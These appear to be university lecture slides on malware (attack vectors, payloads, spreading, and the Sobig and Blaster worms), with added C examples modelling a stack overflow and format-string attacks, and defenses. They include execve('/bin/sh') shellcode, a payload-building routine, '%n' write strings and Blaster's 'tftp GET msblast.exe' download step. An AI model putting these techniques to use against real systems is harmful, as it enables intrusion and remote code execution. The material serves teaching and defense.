Malicious Code for Fun and Profit
Mihai Christodorescu
mihai@cs.wisc.edu
10 March 2005
What is Malicious Code?

Viruses, worms, trojans, … Code that breaks your security policy.

Characteristics:
- Attack vector
- Payload
- Spreading algorithm
Outline

- Attack Vectors
- Payloads
- Spreading Algorithms
- Case Studies
Attack Vectors

- Social engineering
  “Make them want to run it.”
- Vulnerability exploitation
  “Force your way into the system.”
- Piggybacking
  “Make it run when other programs run.”
Social Engineering

- Suggest to the user that the executable is:
  – A game.
  – A desirable picture/movie.
  – An important document.
  – A security update from Microsoft.
  – A security update from the IT department.
- Spoofing the sender helps.
Outline

- Attack Vectors:
  – Social Engineering
  – Vulnerability Exploitation
  – Piggybacking
- Payloads
- Spreading Algorithms
- Case Studies
Vulnerability Exploitation

- Make use of flaws in software input handling.
- Sample techniques:
  – Buffer overflow attacks.
  – Format string attacks.
  – Return-to-libc attacks.
  – SQL injection attacks.
Buffer Overflows: Basic Principles

A buffer overflow occurs when data is stored past the boundaries of an array or a string. The additional data overwrites whatever is adjacent in memory: nearby program variables and, for a buffer on the stack, the saved frame pointer and the return address.

Result: the attacker controls or takes over the currently running process.
Buffer Overflows: Example

Expected input: \\hostname\path

    void process_request( char * req )
    {
        // Get hostname
        char host[ 20 ];
        int pos = find_char( req, '\\', 2 );          // index of the backslash that ends the hostname
        strcpy( host, substr( req, 2, pos - 1 ) );   // no length check: the hostname may be longer than 19 characters
        ...
        return;
    }

Request strings below are shown as the program receives them, not as C escape sequences:

    process_request( "\\tux12\usr\foo.txt" );             ⇒ OK   (hostname "tux12": 5 characters)
    process_request( "\\aaabbbcccdddeeefffggghhh\bar" );  ⇒ BAD  (hostname of 24 characters; host[] holds 19 plus the terminator)
Buffer Overflows: Program Stack

A stack frame per procedure call. While strcpy() runs, the stack holds one frame each for main(), process_request() and strcpy(). The frame of process_request() contains, from higher to lower addresses:

    arg:    req
    return address     (back into main())
    frame pointer      (saved)
    local:  pos
    local:  host[20]

strcpy() fills host[] from host[0] upward, that is, toward the saved frame pointer and the return address.
Buffer Overflows: Normal Execution

    process_request( "\\tux12\usr\foo.txt" );

find_char() returns pos = 7 (the backslash after "tux12"). strcpy() writes t, u, x, 1, 2, \0 into host[0..5]; the other 14 bytes of host[], the saved frame pointer and the return address are untouched.
Buffer Overflows: Overflow Execution

    process_request( "\\aaabbbcccdddeeefffggghhhiiijjj\bar" );

find_char() returns pos = 32: the hostname is 30 characters long. strcpy() writes 31 bytes (a a a b b b c c c d d d e e e f f f g g g h h h i i i j j j \0) into the 20-byte host[]. The first 20 bytes fill host[]; the characters after them spill past the end of the buffer, over the saved frame pointer and onto the return address (on the slide, the bytes marked "i i i j" are the characters that overwrite the return address). When process_request() returns, execution continues at whatever address those bytes spell.
Buffer Overflows: Smashing the Stack

The attacker gets one chance to gain control. Craft an input string such that:
- The return address is overwritten with a pointer to malicious code.
- The malicious code is placed inside the input string.

The malicious code can spawn a shell by executing “/bin/sh”; if the victim process runs as root (a setuid binary or a root daemon), that shell is a root shell.
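The frame layout, the two request strings and the input "Smashing the Stack" describes, replayed as an added C example (mine, not code from the slides). The frame is modelled as a plain byte array using the layout assumed above (host[20] lowest, then the saved frame pointer, then the return address at byte 24); the sentinel return address, the target address and the three "code" bytes are placeholders chosen for illustration, not a working exploit, and all function names are my own.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Assumed frame layout for process_request(), matching the slides' picture:
 * host[20] is lowest in memory, then the saved frame pointer, then the return
 * address. strcpy() writes upward from host[0], so hostname bytes 20..23 land on
 * the saved frame pointer and bytes 24..27 on the return address. */
#define HOST_SIZE    20
#define RET_OFFSET   24
#define FRAME_SIZE   128          /* slack so the model itself can never overflow */
#define RET_SENTINEL 0x08048ABCu  /* stand-in for the real return address into main() */

static uint32_t read_le32(const unsigned char *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

static void write_le32(unsigned char *p, uint32_t v) {
    p[0] = v & 0xff; p[1] = (v >> 8) & 0xff;
    p[2] = (v >> 16) & 0xff; p[3] = (v >> 24) & 0xff;
}

/* Hostname length as the slide's find_char()/substr() compute it: the hostname
 * starts at index 2 of "\\hostname\path" and ends at the next backslash. */
static size_t hostname_len(const char *req) {
    const char *start = req + 2;
    const char *end = strchr(start, '\\');
    return end ? (size_t)(end - start) : strlen(start);
}

/* Replays the unchecked strcpy() into the modelled frame and returns whatever sits
 * in the return-address slot afterwards. Hostnames too long for the model buffer
 * are refused (0) so the model never runs off its own end. */
uint32_t ret_after_copy(const char *req) {
    unsigned char frame[FRAME_SIZE];
    size_t n = hostname_len(req);
    if (n + 1 > FRAME_SIZE) return 0;
    memset(frame, 0, sizeof frame);
    write_le32(frame + RET_OFFSET, RET_SENTINEL);
    memcpy(frame, req + 2, n);   /* the slide's strcpy(host, substr(...)): no bound on n */
    frame[n] = '\0';
    return read_le32(frame + RET_OFFSET);
}

/* Hardened version of the same extraction: the hostname must fit, terminator
 * included, or the request is rejected. Returns 0 on success, -1 otherwise. */
int get_hostname_safe(const char *req, char *host, size_t host_size) {
    if (req[0] != '\\' || req[1] != '\\') return -1;
    size_t n = hostname_len(req);
    if (n >= host_size) return -1;
    memcpy(host, req + 2, n);
    host[n] = '\0';
    return 0;
}

/* The input "Smashing the Stack" asks for: padding up to the return-address slot,
 * then the pointer, then the code. host[] is too small to hold code in front of the
 * pointer, so the code goes after it, and target must be the address just past the
 * pointer (which the attacker has to know or guess). No byte may be '\0' (strcpy()
 * stops there) or '\\' (the hostname ends there). Returns the payload length, or
 * 0 if the pointer or the code contains such a byte. */
size_t build_payload(const unsigned char *code, size_t code_len, uint32_t target,
                     unsigned char *out, size_t out_size) {
    unsigned char addr[4];
    if (out_size < RET_OFFSET + 4 + code_len + 1) return 0;
    write_le32(addr, target);
    for (size_t i = 0; i < 4; i++)
        if (addr[i] == 0 || addr[i] == '\\') return 0;
    for (size_t i = 0; i < code_len; i++)
        if (code[i] == 0 || code[i] == '\\') return 0;
    memset(out, 0x90, RET_OFFSET);                 /* NOP padding over host[] and the saved fp */
    memcpy(out + RET_OFFSET, addr, 4);             /* lands exactly on the return address */
    memcpy(out + RET_OFFSET + 4, code, code_len);  /* what the new return address points at */
    out[RET_OFFSET + 4 + code_len] = '\0';
    return RET_OFFSET + 4 + code_len;
}

/* Round trip: wrap a payload as "\\<payload>\x", push it through the modelled frame
 * and return the value that would be used as the return address. */
uint32_t ret_after_payload(const unsigned char *code, size_t code_len, uint32_t target) {
    unsigned char payload[96];
    char req[104];
    size_t len = build_payload(code, code_len, target, payload, sizeof payload);
    if (len == 0) return 0;
    req[0] = '\\'; req[1] = '\\';
    memcpy(req + 2, payload, len);
    req[2 + len] = '\\'; req[3 + len] = 'x'; req[4 + len] = '\0';
    return ret_after_copy(req);
}
```

Two things the model makes visible that the slides only state: the hostname "aaabbbcccdddeeefffggghhhiiijjj" leaves the bytes "iiij" (0x6A696969 little-endian) in the return-address slot, and build_payload() refuses a target such as 0x08045C00 because its bytes include 0x00 and 0x5C ('\\'), which is why real payloads for this kind of parser must be built around the characters the copy routine and the separator scan treat specially.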
Buffer Overflows: Shell Code

[Figure: byte-level layout of the input string: the machine code bytes, the string "/bin/sh\0", the slots for the two arguments, and at the end the pointer value that overwrites the return address and points back at the code.]

Code for execve( "/bin/sh", arg1, arg2 ) as a Linux x86 system call (eax = 0Bh selects execve; ebx, ecx and edx carry the path, argv and envp):

    mov edx, arg2         ; envp
    mov ecx, arg1         ; argv
    mov ebx, "/bin/sh"    ; address of the path string inside the input
    mov eax, 0Bh          ; system call number 11 = execve
    int 80h               ; enter the kernel
Buffer Overflows: Thicker Armor

- Defenses against stack-smashing attacks:
  – Bounds-checking (copy routines that take the destination size, or languages that check array bounds).
  – Protection libraries (e.g. stack canaries, as in StackGuard).
  – Non-executable stack.
  – Drop privileges and confine the process: setuid()/chroot().
  – Avoid running programs as root!
  – Address randomization (ASLR).
  – Behavioral monitoring.
More Info

- “Smashing the Stack for Fun and Profit” by Aleph One
- StackGuard, RAD, PAX, ASLR
- CERT
Format Strings: Format String Attacks

- Another way to illegally control program values: read or overwrite memory through attacker-supplied input.
- Exploits printf()'s design: the format string, not the caller, decides how many arguments are fetched from the stack.

    printf( "%s: %d", s, x );
Format Strings: printf() Operation

    printf( "%s: %d, %x", s, x, y );

foo() pushes the arguments right to left, so the stack holds y, x, s and, on top, the format string pointer. printf() then walks the format string and, for each conversion, reads the next word up the stack: s for %s, x for %d, y for %x. Nothing tells printf() how many arguments were actually pushed.
Format Strings: Attack 1: Read Any Value

What the code says:          printf( str );
What the programmer meant:   printf( "%s", str );

If str = "%x%x%x%x%s": the four %x conversions each consume and print one word from the stack above the format string pointer; the %s takes the fifth word as a pointer and prints the string at that address. In the slide's picture that fifth word is a pointer to a secret key, so the key is printed to the attacker.
Format Strings: Attack 2: Write to Address

What the code says:          printf( str );

If str = "%x%x%x%x%n": %n writes the number of characters output so far into the integer that the next argument points to. The four %x conversions skip four stack words; the fifth word is used as the destination address. If the attacker can place a chosen value there (on the slide, the location of the return address), printf() performs a write to that address. The value written is the output length, which the attacker adjusts through the field widths of the preceding conversions.
Format Strings: Defenses

- Never use printf() without a format string: printf( "%s", str ), never printf( str ).
- FormatGuard.
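An added C example (mine, not from the slides) that makes the printf() operation and the two attacks above concrete: count_format_args() computes how many arguments a format string makes printf() pull off the stack, which is exactly the lever an attacker holds once printf(str) runs on their input; percent_n_demo() shows the %n write with a pointer we supply ourselves; log_message_safe() is the call the programmer meant. Function names and sample strings are my own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* How many arguments printf() will fetch for a format string: one per conversion,
 * plus one for every '*' width or precision; "%%" fetches none. When the format
 * string is attacker data, this is the number of stack words printf() reads (and,
 * with %n, writes through). Returns -1 if a directive is malformed. */
int count_format_args(const char *fmt) {
    int args = 0;
    for (const char *p = fmt; *p; p++) {
        if (*p != '%') continue;
        p++;
        if (*p == '%') continue;                           /* literal '%' */
        while (*p && strchr("-+ #0", *p)) p++;             /* flags */
        if (*p == '*') { args++; p++; }                    /* width taken from an argument */
        else while (*p >= '0' && *p <= '9') p++;
        if (*p == '.') {                                   /* precision */
            p++;
            if (*p == '*') { args++; p++; }
            else while (*p >= '0' && *p <= '9') p++;
        }
        while (*p && strchr("hlLqjzt", *p)) p++;           /* length modifiers */
        if (!*p || !strchr("diouxXeEfFgGaAcspn", *p)) return -1;
        args++;                                            /* the conversion itself */
    }
    return args;
}

/* What the programmer meant: the untrusted string is an argument, never the format,
 * so its '%' characters are printed, not interpreted. Returns snprintf()'s result. */
int log_message_safe(char *out, size_t out_size, const char *untrusted) {
    return snprintf(out, out_size, "%s", untrusted);
}

/* What %n does: it stores the number of characters written so far into the int the
 * matching pointer argument designates. Here the pointer is ours; in Attack 2 it is
 * whatever stack word the attacker lined up. Returns the stored count. */
int percent_n_demo(void) {
    char buf[32];
    int written = -1;
    snprintf(buf, sizeof buf, "%s: %d%n", "tux12", 7, &written);
    return written;
}
```

For "%x%x%x%x%n" the counter reports five arguments while the vulnerable printf(str) supplied none, which is the whole attack in one number. Modern compilers flag the pattern for you: gcc's -Wformat-security warns on a printf() call whose format is not a literal and which has no further arguments.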
Piggybacking

Malicious code injected into a benign program or data file.

- Host file can be:
  – An executable.
  – A document with some executable content (Word documents with macros, etc.).
Piggybacking Executables

- Modify the program on disk: patch a "jmp evil_code" into a point the program is sure to execute, so the injected code runs whenever the host program runs.

Variations:
- Jump to the malicious code only on certain actions.
- Spread the malicious code throughout the program.
Piggybacking Documents

- Documents with macros: Microsoft Office supports documents with macros scripted in Visual Basic (VBA).
- Macro triggered on:
  – Document open
  – Document close
  – Document save
  – Send document by email
Outline

- Attack Vectors:
  – Social Engineering
  – Vulnerability Exploitation
  – Piggybacking
- Payloads
- Spreading Algorithms
- Case Studies
- Defenses
Payload

Target the interesting data:

    Passwords        ⇒ Keylogger
    Financial data   ⇒ Screen scraper
    User behavior    ⇒ Spyware
    User attention   ⇒ Adware
More Payload Ideas

Victim machines are pawns in a larger attack:
– Botnets.
– Distributed denial of service (DDoS).
– Spam proxies.
– Anonymous FTP sites.
– IRC servers.
Spreading Methods

Depends on the attack vector:
- Email-based ⇒ need email addresses.
- Vulnerability-based ⇒ need IP addresses of hosts running the vulnerable service.
- Piggybacking ⇒ need more files to infect.
Spreading through Email

[Figure: the malware harvests addresses from files on the infected machine and mails copies of itself out over the Internet.]

Address sources:
- HTML files (from the browser cache)
- Windows Address Book
- Outlook Express folders
- Outlook folders
Vulnerable Target Discovery

Need to find Internet (IP) addresses.
- Scanning: random, sequential, bandwidth-limited.
- Target list:
  – Pre-generated.
  – Externally generated ⇒ metaserver worms.
  – Internal target list ⇒ topological worms.
- Passive: contagion worms.
Types of Malicious Code

- Virus: self-replicating, infects programs and documents.
  e.g.: Chernobyl/CIH, Melissa, Elkern
- Worm: self-replicating, spreads across a network.
  e.g.: ILoveYou, Code Red, B(e)agle, Witty
- Trojan: malware hidden inside useful programs.
  e.g.: NoUpdate, KillAV, Bookmarker
- Backdoor: tool allowing unauthorized remote access.
  e.g.: BackOrifice, SdBot, Subseven
- Spyware: secretly monitors system activity.
  e.g.: ISpynow, KeyLoggerPro, Look2me
- Adware: monitors user activity for advertising purposes.
  e.g.: WildTangent, Gator, BargainBuddy

McGraw and Morrisett, “Attacking malicious code: A report to the Infosec Research Council”, Sept./Oct. 2000.
Outline

- Attack Vectors:
  – Social Engineering
  – Vulnerability Exploitation
  – Piggybacking
- Payloads
- Spreading Algorithms
- Case Studies: Sobig
The Sobig Worm

- Mass-mailing, network-aware worm.
- Multi-stage update capabilities.

Variants, with launch and built-in deactivation dates:

    Variant   Launch         Deactivation
    Sobig.A   9 Jan 2003     (none listed)
    Sobig.B   18 May 2003    31 May 2003
    Sobig.C   31 May 2003    8 June 2003
    Sobig.D   18 June 2003   2 July 2003
    Sobig.E   25 June 2003   14 July 2003
    Sobig.F   18 Aug 2003    10 Sept 2003
Sobig: Attack Vector

- Email with a spoofed sender (the slide's sample message is From: big@boss.com):
  – Compressed executable attachment with a renamed extension.
  – Later: attachment in a ZIP file.
- Network shares.
Sobig: Payload

[Figure: the multi-stage update chain. Infected hosts consult a Geocities web page, which points them at a Trojan web server running on hacked DSL/cable hosts (numbered 1 … 22 in the figure), from which the later stages are downloaded.]

- 1st stage: backdoor (Lala) & keylogger.
- 2nd stage: proxy (WinGate).
Sobig: Spreading Algorithm

- E-mail addresses extracted from files on disk.
- Network shares automatically discovered.
Sobig.F in Numbers

[Figure: daily Sobig.F message counts, 19 to 23 August 2003. Courtesy of MessageLabs.com]
Outline

- Attack Vectors:
  – Social Engineering
  – Vulnerability Exploitation
  – Piggybacking
- Payloads
- Spreading Algorithms
- Case Studies: Sobig, Blaster
The Blaster Worm

- Multi-stage worm exploiting a Windows vulnerability.

Timeline (slide dated 17 August 2003; axis ticks at 16, 25 and 31 July and 11, 13, 15, 17 and 19 August):
- Microsoft releases the patch (16 July).
- LSD Research exploit released (25 July).
- CERT advisory.
- Blaster appears (11 August).
- Metasploit refined exploit.
- 1.2 million hosts infected.
- Impact: FRB Atlanta, MD DMV, BMW; a Scandinavian bank closes all 70 branches.
Blaster: Attack Vector

- Uses a Microsoft Windows RPC DCOM vulnerability.
- Coding flaw:
  1. The RPC service passes part of the request to the function GetMachineName().
  2. GetMachineName() copies the machine name into a fixed 32-byte buffer without checking its length: the same pattern as the process_request() example, with a remote request instead of a local string.
Blaster: Attack Vector

[Figure: the five-step infection sequence between an already-infected host and the victim.]

1. Exploit: the infected host sends the RPC DCOM exploit to the victim.
2. Through the shell the exploit gives it, it runs "tftp GET msblast.exe" on the victim.
3. The victim's TFTP client sends "GET msblast.exe" to the TFTP server on the infected host.
4. The TFTP server delivers msblast.exe to the victim.
5. "start msblast.exe": the worm is launched on the victim, which now repeats the sequence against new targets.
Blaster: Payload

- The worm installs itself to start automatically.
- All infected hosts perform a DDoS against windowsupdate.com:
  – SYN flood with spoofed source IP, from 15 August through 31 December, and after the 15th of every other month.
Blaster: Effect on Local Host

- RPC/DCOM disabled:
  – Inability to cut/paste.
  – Inability to move icons.
  – Add/Remove Programs list empty.
  – DLL errors in most Microsoft Office programs.
  – Generally slow or unresponsive system performance.
Blaster: Spreading Algorithm

- Build the IP address list:
  – 40% chance to start with the local IP address.
  – 60% chance to generate a random IP address.
- Probe 20 IPs at a time.
- Exploit type:
  – 80% Windows XP.
  – 20% Windows 2000.
Blaster: Infection Rate

[Figure: Blaster infection rate over time; the chart itself did not survive extraction.]
Future Threat: Superworm

“Curious Yellow: the First Coordinated Worm Design” – Brandon Wiley

- Fast replication & adaptability:
  – Pre-scan the network for targets.
  – Worm instances communicate to coordinate the infection process.
  – Attack vectors can be updated.
  – Worm code mutates.
Conclusions

- Vulnerabilities left unpatched can and will be used against you.
- Attackers are more sophisticated.
- Need to understand the attackers’